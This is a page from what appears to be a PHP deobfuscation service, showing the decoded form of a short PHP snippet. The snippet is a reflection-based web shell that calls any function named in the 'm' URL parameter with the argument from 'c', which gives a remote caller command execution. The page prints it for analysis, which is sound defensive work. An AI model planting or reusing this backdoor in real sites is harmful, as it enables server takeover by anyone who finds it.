Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $func = new ReflectionFunction($_GET[m]); echo $func->invokeArgs(array($..

Decoded Output download

 
<?php 
    $func = new ReflectionFunction($_GET[m]); 
    echo $func->invokeArgs(array($_GET[c])); 
?>

Did this file decode correctly?

Original Code


<?php
    $func = new ReflectionFunction($_GET[m]);
    echo $func->invokeArgs(array($_GET[c]));
?>

Function Calls

None

Variables

None

Stats

MD5 df52e60ec5ba68c4f88b8714d5d9092e
Eval Count 0
Decode Time 120 ms